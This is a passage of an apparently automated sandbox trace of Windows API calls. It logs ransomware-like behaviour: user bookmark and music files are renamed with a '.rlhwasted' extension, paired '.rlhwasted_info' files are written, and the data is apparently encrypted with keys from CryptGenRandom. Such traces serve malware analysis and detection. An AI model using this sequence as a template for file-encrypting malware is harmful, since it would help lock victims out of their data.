"c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0193.819] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0193.821] SetEndOfFile (hFile=0x128) returned 1 [0193.821] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.821] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.821] lstrcpyW (in: lpString1=0x6ee4e4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.rlhwasted")) returned 1 [0193.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0193.891] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0193.891] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0193.891] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0193.891] CloseHandle (hObject=0x104) returned 1 [0193.897] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0193.898] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.898] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.898] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0193.899] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0193.899] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.034] SetEndOfFile (hFile=0x128) returned 1 [0194.036] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.036] CloseHandle (hObject=0x128) returned 1 [0194.044] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0194.045] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee1a8 | out: hHeap=0x6b0000) returned 1 [0194.045] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0194.046] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.046] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0194.046] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6ee458 [0194.046] lstrcpyW (in: lpString1=0x6ee4d8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.046] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.046] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0194.047] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.047] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.048] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.050] SetEndOfFile (hFile=0x128) returned 1 [0194.050] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.050] lstrcpyW (in: lpString1=0x6ee4d8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.rlhwasted")) returned 1 [0194.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0194.051] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.051] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0194.051] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0194.051] CloseHandle (hObject=0x110) returned 1 [0194.054] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0194.055] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.055] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.055] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0194.056] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.056] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.068] SetEndOfFile (hFile=0x128) returned 1 [0194.071] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.071] CloseHandle (hObject=0x128) returned 1 [0194.072] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0194.073] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee378 | out: hHeap=0x6b0000) returned 1 [0194.073] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0194.108] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.108] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.108] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0194.108] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6e8978 [0194.108] lstrcpyW (in: lpString1=0x6e8a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.109] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.109] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0194.109] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.109] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.115] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.116] SetEndOfFile (hFile=0x128) returned 1 [0194.116] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.116] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.116] lstrcpyW (in: lpString1=0x6e8a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.rlhwasted")) returned 1 [0194.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0194.158] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.158] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0194.158] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0194.158] CloseHandle (hObject=0x110) returned 1 [0194.160] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0194.162] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.162] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.162] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0194.162] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.162] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.172] SetEndOfFile (hFile=0x128) returned 1 [0194.175] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.175] CloseHandle (hObject=0x128) returned 1 [0194.177] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0194.177] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0194.177] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f98) returned 1 [0194.178] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.178] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0194.178] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0194.178] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.178] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.178] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f98) returned 1 [0194.179] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.179] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.180] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.181] SetEndOfFile (hFile=0x128) returned 1 [0194.182] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.182] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.182] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.rlhwasted")) returned 1 [0194.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.234] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.234] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0194.234] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0194.234] CloseHandle (hObject=0x108) returned 1 [0194.237] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0194.238] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.238] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.238] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0194.239] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.239] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.249] SetEndOfFile (hFile=0x128) returned 1 [0194.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.252] CloseHandle (hObject=0x128) returned 1 [0194.254] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0194.254] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700768 | out: hHeap=0x6b0000) returned 1 [0194.255] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0194.256] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.256] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.256] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0194.256] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0194.256] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.256] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.256] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0194.257] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.257] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0194.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.258] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.259] SetEndOfFile (hFile=0x128) returned 1 [0194.259] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.259] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.259] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.rlhwasted")) returned 1 [0194.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.499] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0194.499] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0194.499] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0194.499] CloseHandle (hObject=0x108) returned 1 [0194.511] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0194.512] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.512] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.512] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0194.513] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.513] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.522] SetEndOfFile (hFile=0x128) returned 1 [0194.524] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.524] CloseHandle (hObject=0x128) returned 1 [0194.528] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0194.529] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700868 | out: hHeap=0x6b0000) returned 1 [0194.531] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f98) returned 1 [0194.534] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.534] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uDi71Sc.wav") returned 51 [0194.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x270) returned 0x6e8978 [0194.534] lstrcpyW (in: lpString1=0x6e89de, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.534] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f98) returned 1 [0194.535] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.535] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uDi71Sc.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\udi71sc.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.648] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.649] SetEndOfFile (hFile=0x128) returned 1 [0194.649] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.649] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.649] lstrcpyW (in: lpString1=0x6e89de, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uDi71Sc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\udi71sc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uDi71Sc.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\udi71sc.wav.rlhwasted")) returned 1 [0194.650] CreateFileW 